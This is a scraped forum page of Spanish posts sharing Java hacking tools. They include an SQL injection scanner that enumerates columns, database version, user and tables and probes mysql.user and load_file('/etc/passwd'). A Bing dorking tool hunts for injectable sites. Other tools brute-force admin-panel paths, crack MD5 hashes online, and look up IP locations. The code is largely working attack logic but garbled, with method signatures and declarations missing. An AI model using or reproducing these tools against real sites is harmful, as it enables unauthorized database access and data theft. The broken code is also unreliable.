println("\n[+] Getting tables ....\n"); code = toma(web1 + "+from+information_schema.tables--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] Tables Found : " + dos. group(1) + "\n"); savefile(urla, ""); int finals = Integer. parseInt(dos. group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] Table Found : " + dos. group(1)); savefile(urla, "[+] Table Found : " + dos.group(1)); } } } else { System. out. println("[-] Not Found"); } } Pattern uno = null; Matcher dos = null; target = urla; System. out. println("\n[+] Checking ...\n"); codex = toma(target + "-1+union+select+666--"); uno = Pattern.compile("The used SELECT statements have a different number of columns"); dos = uno.matcher(codex); if (dos.find()) { System. out. println("[+] Scanning ...\n"); int x; urlfinal = ""; formariny = ""; for (x = 1; x <= 5; x = x + 1) { //urlfinal = urlfinal+x+","; urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ","; formariny = formariny + x + ","; otrofinal = urlfinal; otroformar = formariny; otrofinal = otrofinal.substring(0, otrofinal.length() - 1); otroformar = otroformar.substring(0, otroformar.length() - 1); code = toma(target + "-1+union+select+" + otrofinal); uno = Pattern.compile("RATSXPDOWN(\\d+)"); dos = uno.matcher(code); if (dos.find()) { otroformar = otroformar.replace(dos.group(1), "hackman"); link = target + "-1+union+select+" + otroformar; System. out. println("[Target] : " + link ); System. out. println("[Limit] : The site has " + x + " columns"); System. out. println("[Data] : The number " + dos. group(1) + " print data"); savefile(link, "\r\n" + "[Target] : " + link); savefile(link, "[Limit] : The site has " + x + " columns"); savefile(link, "[Data] : The number " + dos.group(1) + " print data"); manejo(link); } } System. out. println("[-] Error"); } else { System. out. println("[-] Not vulnerable"); } } Pattern uno = null; Matcher dos = null; concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))"; urla = urla.replace("hackman", concat); System. out. println("\n[+] Searching informaion ...\n"); code = toma(urla); uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] DB Version : " + dos. group(1)); System. out. println("[+] DB Name : " + dos. group(2)); System. out. println("[+] Username : " + dos. group(3)); savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1)); savefile(urla, "[+] DB Name : " + dos.group(2)); savefile(urla, "[+] Username : " + dos.group(3)); } else { System. out. println("[-] Not found any data"); } urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)"); code = toma(urla + "+from+information_schema.tables--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] information_schema : on"); savefile(urla, "[+] information_schema : on"); } else { System. out. println("[-] information_schema : off"); } code = toma(urla + "+from+mysql.user--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] mysqluser : on"); savefile(urla, "[+] mysqluser : on"); } else { System. out. println("[-] mysquser : off"); } urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))"); code = toma(urla); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[-] load_file : on"); savefile(urla, "[-] load_file : on"); } else { System. out. println("[-] load_file : off"); } } formar = "logs/" + h.getHost() + ".txt"; writer.write(texto + "\r\n"); writer.close(); } hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } //Thanks to Katarina Majetic //Based on http://www.dzone.com/snippets/encode-string-hex byte[] z = text.getBytes(); int n; int a = z.length; int u; for (n = 0; n < a; n++) { u = z[n] & 0x000000FF; h.append(l); } return "0x" + h.toString(); } } //The End ?
|
|
|
196
|
Programación / Java / [Java] SQL Scanner 0.1
|
en: 13 Enero 2013, 03:40 am
|
Un simple Scanner SQLI hecho en Java. //SQL Scanner 0.1 //Coded By Doddy H import java.util.Scanner; import java.io.*; import java.net.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { Pattern uno = null; Matcher dos = null; Scanner host = new Scanner (System. in); System. out. println("\n\n-- == SQL Scanner 0.1 == --\n\n"); System. out. println("[+] Page : "); target = host.nextLine(); System. out. println("\n[+] Checking ...\n"); codex = toma(target + "-1+union+select+666--"); uno = Pattern.compile("The used SELECT statements have a different number of columns"); dos = uno.matcher(codex); if (dos.find()) { System. out. println("[+] Scanning ...\n"); int x; urlfinal = ""; formariny = ""; for (x = 1; x <= 5; x = x + 1) { //urlfinal = urlfinal+x+","; urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ","; formariny = formariny + x + ","; otrofinal = urlfinal; otroformar = formariny; otrofinal = otrofinal.substring(0, otrofinal.length() - 1); otroformar = otroformar.substring(0, otroformar.length() - 1); code = toma(target + "-1+union+select+" + otrofinal); uno = Pattern.compile("RATSXPDOWN(\\d+)"); dos = uno.matcher(code); if (dos.find()) { otroformar = otroformar.replace(dos.group(1), "hackman"); link = target + "-1+union+select+" + otroformar; System. out. println("[Target] : " + link ); System. out. println("[Limit] : The site has " + x + " columns"); System. out. println("[Data] : The number " + dos. group(1) + " print data"); savefile("logs-scansql.txt", "[Target] : " + link); savefile("logs-scansql.txt", "[Limit] : The site has " + x + " columns"); savefile("logs-scansql.txt", "[Data] : The number " + dos.group(1) + " print data"); System. out. println("\n[+] Searching informaion ...\n"); details(link); System. out. println("\n[+] Finished"); System. out. println("\n-- == Coded By Doddy H == --"); savefile("logs-scansql.txt", "\n-----------------\n"); } } System. out. println("[-] Error"); } else { System. out. println("[-] Not vulnerable"); } } Pattern uno = null; Matcher dos = null; concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))"; urla = urla.replace("hackman", concat); code = toma(urla); uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] DB Version : " + dos. group(1)); System. out. println("[+] DB Name : " + dos. group(2)); System. out. println("[+] Username : " + dos. group(3)); savefile("logs-scansql.txt", "[+] DB Version : " + dos.group(1)); savefile("logs-scansql.txt", "[+] DB Name : " + dos.group(2)); savefile("logs-scansql.txt", "[+] Username : " + dos.group(3)); } else { System. out. println("[-] Not found any data"); } urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)"); code = toma(urla + "+from+information_schema.tables--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] information_schema : on"); savefile("logs-scansql.txt", "[+] information_schema : on"); } else { System. out. println("[-] information_schema : off"); } code = toma(urla + "+from+mysql.user--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] mysqluser : on"); savefile("logs-scansql.txt", "[+] mysqluser : on"); } else { System. out. println("[-] mysquser : off"); } urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))"); //ystem.out.print(urla); code = toma(urla); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[-] load_file : on"); savefile("logs-scansql.txt", "[-] load_file : on"); } else { System. out. println("[-] load_file : off"); } } writer.write(texto + "\r\n"); writer.close(); } hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } //Thanks to Katarina Majetic //Based on http://www.dzone.com/snippets/encode-string-hex byte[] z = text.getBytes(); int n; int a = z.length; int u; for (n = 0; n < a; n++) { u = z[n] & 0x000000FF; h.append(l); } return "0x" + h.toString(); } } //The End ?
Ejemplo de uso -- == SQL Scanner 0.1 == --
[+] Page : http://localhost/sql.php?id=
[+] Checking ...
[+] Scanning ...
[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3 [Limit] : The site has 3 columns [Data] : The number 1 print data
[+] Searching informaion ...
[+] DB Version : 5.5.20-log [+] DB Name : hackman [+] Username : root@localhost [+] information_schema : on [+] mysqluser : on [-] load_file : off
[+] Finished
-- == Coded By Doddy H == --
|
|
|
197
|
Programación / Java / [Java] BingHack Tool 0.1
|
en: 13 Enero 2013, 03:39 am
|
Un simple programa para buscar en Bing paginas vulnerables a SQLI. // //BingHack Tool 0.1 //Coded By Doddy H // import java.util.Scanner; import java.io.*; import java.net.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { int x; int counte; Pattern uno = null; Matcher dos = null; Scanner host = new Scanner (System. in); System. out. println("\n\n-- == BingHack Tool 0.1 == --\n\n"); System. out. println("[+] Dork : "); dork = host.nextLine(); System. out. println("[+] Count : "); counte = host.nextInt(); System. out. println("\n[+] Searching ...\n"); for (x = 10; x <= counte; x = x + 10) { code = toma("http://www.bing.com/search?q=" + dork + "&first=" + x); uno = Pattern.compile("<h3><a href=\"(.*?)\""); dos = uno.matcher(code); while (dos.find()) { urlfinal = cortar(dos.group(1)); sql(urlfinal); } } System. out. println("\n[+] Finished"); System. out. println("\n-- == Coded By Doddy H == --"); } writer.write(texto + "\r\n"); writer.close(); } Pattern uno = null; Matcher dos = null; mostrar = urla + "-1+union+select+666--"; try { code = toma(mostrar); uno = Pattern.compile("The used SELECT statements have a different number of columns"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] SQLI : " + urla ); savefile("sql-logs.txt", urla); } } } Pattern uno = null; Matcher dos = null; uno = Pattern.compile("(.*)=(.*)"); dos = uno.matcher(urla); if (dos.find()) { return (dos.group(1) + "="); } else { return "no tengo idea xDD"; } } hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } } //The End ?
|
|
|
198
|
Programación / Java / [Java] LocateIP 0.1
|
en: 13 Enero 2013, 03:39 am
|
Un simple programa para buscar la localizacion de una IP. //LocateIP 0.1 //Coded By Doddy H import java.util.Scanner; import java.io.*; import java.net.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { Scanner host = new Scanner (System. in); System. out. println("\n\n-- == LocateIP 0.1 == --\n\n"); System. out. println("[+] IP : "); ip = host.nextLine(); code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress=" + ip); Pattern uno = null; Matcher dos = null; uno = Pattern.compile("City</td><td align=(.*?)><b>(.*?)</b></td>"); dos = uno.matcher(code); if (!dos.find()) { System. out. println("[+] City : Not Found"); } else { System. out. println("[+] City : " + dos. group(2)); } uno = Pattern.compile("Country</td><td align=(.*?)><b>(.*?)</b></td>"); dos = uno.matcher(code); if (!dos.find()) { System. out. println("[+] Country : Not Found"); } else { System. out. println("[+] Country : " + dos. group(2)); } uno = Pattern.compile("State or Region</td><td align=(.*?)><b>(.*?)</b></td>"); dos = uno.matcher(code); if (!dos.find()) { System. out. println("[+] State or Region : Not Found"); } else { System. out. println("[+] State or Region : " + dos. group(2)); } //code = toma("http://www.ip-adress.com/reverse_ip/178.33.230.100"); //uno = Pattern.compile("/whois/(.*?)\">Whois"); //dos = uno.matcher(code); //while(dos.find()) { //System.out.println("[+] DNS : "+dos.group(1)); //} System. out. println("\n\n-- == Coded By Doddy H == --"); } hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } } // The End ?
|
|
|
199
|
Programación / Java / [Java] PanelFinder 0.1
|
en: 13 Enero 2013, 03:39 am
|
Un simple programa para buscar el famoso panel de administracion en una pagina. //PanelFinder 0.1 //Coded By Doddy H import java.util.Scanner; import java.net.URL; public class Main { public static void main (String[] args ) { "admin/admin.asp", "admin/login.asp", "admin/index.asp", "admin/admin.aspx", "admin/login.aspx", "admin/index.aspx", "admin/webmaster.asp", "admin/webmaster.aspx", "asp/admin/index.asp", "asp/admin/index.aspx", "asp/admin/admin.asp", "asp/admin/admin.aspx", "asp/admin/webmaster.asp", "asp/admin/webmaster.aspx", "admin/", "login.asp", "login.aspx", "admin.asp", "admin.aspx", "webmaster.aspx", "webmaster.asp", "login/index.asp", "login/index.aspx", "login/login.asp", "login/login.aspx", "login/admin.asp", "login/admin.aspx", "administracion/index.asp", "administracion/index.aspx", "administracion/login.asp", "administracion/login.aspx", "administracion/webmaster.asp", "administracion/webmaster.aspx", "administracion/admin.asp", "administracion/admin.aspx", "php/admin/", "admin/admin.php", "admin/index.php", "admin/login.php", "admin/system.php", "admin/ingresar.php", "admin/administrador.php", "admin/default.php", "administracion/", "administracion/index.php", "administracion/login.php", "administracion/ingresar.php", "administracion/admin.php", "administration/", "administration/index.php", "administration/login.php", "administrator/index.php", "administrator/login.php", "administrator/system.php", "system/", "system/login.php", "admin.php", "login.php", "administrador.php", "administration.php", "administrator.php", "admin1.html", "admin1.php", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "adm/", "admin/account.php", "admin/account.html", "admin/index.html", "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/login.html", "administrator/account.html", "administrator/account.php", "administrator.html", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/home.asp", "admin/controlpanel.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/"}; Scanner host = new Scanner (System. in); System. out. println("\n\n-- == PanelFinder 0.1 == --\n\n"); System. out. println("[+] URL : "); target = host.nextLine(); System. out. println("\n[+] Scanning ...\n"); for (int count = 0; count < paneles.length; count++) { ur = target + "/" + paneles[count]; try { System. out. println("[+] Link : " + ur ); } } System. out. println("\n[+] Finished\n"); System. out. println("-- == Coded By Doddy H == --"); } } //The End ?
|
|
|
200
|
Programación / Java / [Java] CrackHash 0.1
|
en: 13 Enero 2013, 03:38 am
|
Un simple programa para crackear un hash md5 mediante una pagina online. // //CrackHash 0.1 //Coded By Doddy H // //Test with 098f6bcd4621d373cade4e832627b4f6 // // import java.util.Scanner; import java.io.*; import java.net.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { Scanner host = new Scanner (System. in); System. out. println("\n\n-- == CrackHash 0.1 == --\n\n"); System. out. println("[+] Hash : "); hash = host.nextLine(); code = toma("http://md5.hashcracking.com/search.php?md5=" + hash); Pattern uno = null; Matcher dos = null; uno = Pattern.compile("Cleartext of (.*) is (.*)"); dos = uno.matcher(code); if (!dos.find()) { System. out. println("\n[-] Not Found"); } else { System. out. println("\n[+] Hash Cracked : " + dos. group(2)); } System. out. println("\n\n-- == Coded By Doddy H == --"); } hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } } //The End ?
|
|
|
|
|
|
|